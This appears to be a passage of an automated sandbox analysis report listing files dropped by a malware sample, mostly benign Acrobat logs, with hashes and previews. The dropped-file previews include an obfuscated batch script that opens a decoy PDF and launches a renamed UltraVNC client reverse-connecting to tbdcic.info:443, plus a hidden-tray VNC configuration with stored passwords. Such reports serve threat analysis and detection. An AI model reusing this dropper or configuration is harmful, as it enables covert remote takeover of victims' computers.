                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e4ae1c7729f27fd44f892cbc01c1f30b","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734957457000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"50fa4d4063a80b5511acce1009573361","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734957457000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"049ccafc3f0c97ef385a51c590d43b9f","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734957457000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"2a8a137c750ac64e3b7e44bc3588b893","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734957457000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"c9d597d6916a1ee09d12b708f105cdda","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734957457000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"34b8786b493a9e1911ba236267a4fd31","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                  Category:dropped
                                                                  Size (bytes):12288
                                                                  Entropy (8bit):0.9857228271258511
                                                                  Encrypted:false
                                                                  SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/Sp2xf4zJwtNBwtNbRZ6bRZ45xfF:TVl2GL7ms6ggOVp9zutYtp6P8
                                                                  MD5:03C7ECFF221663DF33FBC0E69F96DCB4
                                                                  SHA1:567BA52614AC38A63E7AF15455074E9C0C49CE48
                                                                  SHA-256:27323B536345128B1C48580F8F08B03915900617AB0450CB908C274B4B751A0F
                                                                  SHA-512:4C0544DA9F2563E5CC6D0969E90BD2E15E0BED9B5E971F3182AE509EA2D92C32B04516C1117935CC19FFEED1799BAF40AE222F72B0D38BB30D12E6E1C40D394C
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite Rollback Journal
                                                                  Category:dropped
                                                                  Size (bytes):8720
                                                                  Entropy (8bit):1.3406207947555013
                                                                  Encrypted:false
                                                                  SSDEEP:24:7+tSmAD1RZKHs/Ds/Sp2xfPzJwtNBwtNbRZ6bRZWf1RZKXqLBx/XYKQvGJF7urs0:7MSmGgOVpmzutYtp6PMaqll2GL7ms0
                                                                  MD5:D62BD0373AF1FFD5A2A1E15DA8BC689B
                                                                  SHA1:C0C5B4669CBAF387364FA6B601079AE8BD19BB24
                                                                  SHA-256:FB61C8292D4C46F0844B4A389B109D1458A114D93139B4AFA55916750195C0B8
                                                                  SHA-512:82DD2CC9CA67F8F2EEA9347C400E8F95134040D1EE01AF97DC6225178BB80880F6D72C13E82C60EE7AC17E44B3F2262B766FC7F20ADB8DC4291F742F7B5C13B4
                                                                  Malicious:false
                                                                  Preview:.... .c........P......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):66726
                                                                  Entropy (8bit):5.392739213842091
                                                                  Encrypted:false
                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEg7jWMp61bx5bQxUIY0gwP47SYyu:6a6TZ44ADE7jfE1bbbQxOSK
                                                                  MD5:54CF51588C67985A85F574D62ADA8826
                                                                  SHA1:E3E611A8B9F0B3809BC27DD4054D93FF737C3FA2
                                                                  SHA-256:1EF8DF8C8823C68BEE9716D9C1E9F16636954FF543460C59B5C93EBFA83B7FAA
                                                                  SHA-512:40ABCDC9D4CA103C21A53CC96FE949F3BFF05F2FAF1B2F14E34D5E69235B5E4F5E009AABE79E97F620737DE8A3FAE90FC7C29EB24D78DC5D854D3ACBD8CC2A62
                                                                  Malicious:false
                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                  Process:C:\Users\user\Desktop\mSRW5AfJpC.exe
                                                                  File Type:DOS batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1063
                                                                  Entropy (8bit):5.649012890742747
                                                                  Encrypted:false
                                                                  SSDEEP:24:g7JL6o/0aEMk4SH2ZckJeqIjq+JG4v/aJeqT2aJHfth439HJGVfx/m:8D/hL12q+K1HW39HSfx/m
                                                                  MD5:1BE7E5C957D00F505D8F9916CF850EE9
                                                                  SHA1:FB7573845F343A8ECA85451F1E2E58AFCEB0AC6B
                                                                  SHA-256:FCDED7D427BD65E160F5C792B38C5139B0C0B557F236B6F1D4636341F1E8BB32
                                                                  SHA-512:292DD30C40ED41E9F9335A5D0518F045629E6906FB4A51A4A4001F56BE9F393DD009E7D3B8DE04F83B1907B543716497603946818F931C6095E5C49B3006F8AA
                                                                  Malicious:false
                                                                  Preview:@echo off.setlocal enabledelayedexpansion.set vrh8AP=nhost.set muJYZp=nne.set BkbbBh=co.set MOaMlN=exe.set v0nVqH=Lom.set ZlYUDn=pdf.set UIS2A9=raVNC.set AHvFn8=%COMPUTERNAME%.set qVC5W0=autore.set WSmdXm=%WINDIR%\Tasks\144012088.cmd.set K7aM5W=tbdcic.info.set oSxXQL=TtF9ns.set sUWZqy=443.set XvryyK=co.set E3PqLw=ct.set RMGYdl=Ult.set jQMRAv=sync_browser.set WOH7MQ=ini.timeout /t 1.copy "ndymzn.PPYh2u" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%" & start "" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%".timeout /t 1.taskkill /f /im %jQMRAv%.%MOaMlN% .timeout /t 2.copy "Fgyxfc.Qnwi4I" "%jQMRAv%.%MOaMlN%".timeout /t 1.copy "B7MqI9.IYF1N0" "%RMGYdl%%UIS2A9%.%WOH7MQ%".timeout /t 2.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% .timeout /t 8.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% -%qVC5W0%%BkbbBh%%muJYZp%%E3PqLw% -id:%AHvFn8%_%oSxXQL% -%BkbbBh%%muJYZp%%E3PqLw% %K7aM5W%:%sUWZqy%.timeout /t 2.copy "Ivn55G.PqhJnU" "%XvryyK%%vrh8AP%.%MOaMlN%".timeout /t 4.:loop.if exist "%WSmdXm%" (. cmd /c "%WSmdXm%". tim
                                                                  Process:C:\Users\user\Desktop\mSRW5AfJpC.exe
                                                                  File Type:Generic INItialization configuration [admin]
                                                                  Category:dropped
                                                                  Size (bytes):858
                                                                  Entropy (8bit):5.216893826927931
                                                                  Encrypted:false
                                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                  Malicious:false
                                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                                  Process:C:\Users\user\Desktop\mSRW5AfJpC.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1945368
                                                                  Entropy (8bit):6.532894678367002
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: 7q551ugrWe.exe, Detection: malicious, Browse
                                                                  • Filename: T8xrZb7nBL.exe, Detection: malicious, Browse
                                                                  • Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\mSRW5AfJpC.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):867840
                                                                  Entropy (8bit):6.386550733462827
                                                                  Encrypted:false
                                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: 7q551ugrWe.exe, Detection: malicious, Browse
                                                                  • Filename: T8xrZb7nBL.exe, Detection: malicious, Browse
                                                                  • Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\mSRW5AfJpC.exe
                                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                  Category:dropped
                                                                  Size (bytes):605114
                                                                  Entropy (8bit):7.931189302613814
                                                                  Encrypted:false
                                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                  Malicious:false
                                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):246
                                                                  Entropy (8bit):3.518261198325562
                                                                  Encrypted:false
                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAk9:Qw946cPbiOxDlbYnuRKDlD9
                                                                  MD5:D59706F662008202BAAF1F7AE9D25ACE
                                                                  SHA1:AF41FA28C39D61C6E6BA46C9E764BF76B147C9B7
                                                                  SHA-256:307F7751C7917E67C3A8F2EB879077977A0EF0193D341C6461FEF9A3C8225121
                                                                  SHA-512:2D9135C4D09FF1843F5096806F48F4F099097518742D901B42934E26E709D50FF40C64FB3430305E40D7B3A0FD7716FF69AF9459EC347F8A4B255ED40CB4C336
                                                                  Malicious:false
                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.3.7.:.3.5. .=.=.=.....
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with very long lines (393)
                                                                  Category:dropped
                                                                  Size (bytes):16525
                                                                  Entropy (8bit):5.376360055978702
                                                                  Encrypted:false
                                                                  SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                  MD5:1336667A75083BF81E2632FABAA88B67
                                                                  SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                  SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                  SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                  Malicious:false
                                                                  Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):15112
                                                                  Entropy (8bit):5.365577654614899
                                                                  Encrypted:false
                                                                  SSDEEP:384:07fUZUkUBUrUCUnPU6UpU/FSFgFDu8GuJu+4s4A5C5GS5SFSASjSzdfQfwfCbsw3:y7A
                                                                  MD5:79E82B74A6F4E7C37E43B303F6D3B2A8
                                                                  SHA1:16C8CBA3AAF8E6D6EBAA0C7F54633B27434AEB9E
                                                                  SHA-256:1243B27A071895A6C4CF9B2EAE2CDB69878256352D90E4676A1DB95A70103BBF
                                                                  SHA-512:BCE88C8B733237FB85F1A0CB155BFC917DEA02BE9324F377550AD31D9D3C0BDE8BFB443F73843B7050A2598C122B15CECBF932BB961D931831D998BE622C08AE
                                                                  Malicious:false
                                                                  Preview:SessionID=8d8a72db-ec02-4882-b6e9-0bc62aac5385.1734957449111 Timestamp=2024-12-23T07:37:29:111-0500 ThreadID=4196 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=8d8a72db-ec02-4882-b6e9-0bc62aac5385.1734957449111 Timestamp=2024-12-23T07:37:29:112-0500 ThreadID=4196 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=8d8a72db-ec02-4882-b6e9-0bc62aac5385.1734957449111 Timestamp=2024-12-23T07:37:29:112-0500 ThreadID=4196 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=8d8a72db-ec02-4882-b6e9-0bc62aac5385.1734957449111 Timestamp=2024-12-23T07:37:29:112-0500 ThreadID=4196 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=8d8a72db-ec02-4882-b6e9-0bc62aac5385.1734957449111 Timestamp=2024-12-23T07:37:29:112-0500 ThreadID=4196 Component=ngl-lib_NglAppLib Description="SetConf
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29752
                                                                  Entropy (8bit):5.402047023177553
                                                                  Encrypted:false
                                                                  SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbb:v
                                                                  MD5:4D5931BFD549B263BE5CC503785A5557
                                                                  SHA1:F6A058FFA7AF8109BF285D8EA51D4A5CC2576C21
                                                                  SHA-256:49F8EA347A54C305436914BF4BAC3F1FCF681F18290ACF9BB64E6D28FBE406D8
                                                                  SHA-512:BC95C5931BC3A54BE104A9D5820407B18A619AFA3AC687F34E5B4CEB1A961092935535FE55F214CAB0FA653F3AA9781777196DC589D6C695E060CF30A8208255
                                                                  Malicious:false
                                                                  Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                  Category:dropped
                                                                  Size (bytes):758601
                                                                  Entropy (8bit):7.98639316555857
                                                                  Encrypted:false
                                                                  SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                  MD5:3A49135134665364308390AC398006F1
                                                                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                  Malicious:false
                                                                  Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                  Category:dropped
                                                                  Size (bytes):1419751
                                                                  Entropy (8bit):7.976496077007677
                                                                  Encrypted:false
                                                                  SSDEEP:24576:/9wYIGNPQmeWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:lwZG2XWLxXGZN3mlind9i4ufFXpAXkru
                                                                  MD5:CDB0A9F62FD4871F0603FBBF1FE6BD06
                                                                  SHA1:C972A2B8E6E7CD72A156C1EAB8F5F31E76A7DA24
                                                                  SHA-256:85BD3F2168D078DFF0ECEB670C3DC651E8797522C6A2921EC478EAD5A09E415F
                                                                  SHA-512:7FC3B110A45F9D518FEA45930B73F196FEE7DF472A17FB2CBB19A3BCBF5C78D439F68E2C615D8DACD5821EF60C1447112FB86431D768E28D9F08457563011F28
                                                                  Malicious:false
                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                  Category:dropped
                                                                  Size (bytes):1407294
                                                                  Entropy (8bit):7.97605879016224
                                                                  Encrypted:false
                                                                  SSDEEP:24576:/xLtwYIGNPzWL07o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tGZd:JJwZG5WLxB3mlind9i4ufFXpAXkrfUsb
                                                                  MD5:D38CB76360DDA78820460E5C5F20061C
                                                                  SHA1:F2B65831130B70F2A3DC345F70C4BEEDE9AB40E8
                                                                  SHA-256:55E70B5D5F8BE28D648BCDFE7DEB02BF4BBE2F626D620D4D838E0FA4FBF45F8E
                                                                  SHA-512:5E31738169A6FE92062B0E582489DEEAC2FA1798965DED94EFA994965470A15B5095851701E4DF631C5EC4454913272F1156EC46B32DA782D3C0F9E490C129A1
                                                                  Malicious:false
                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
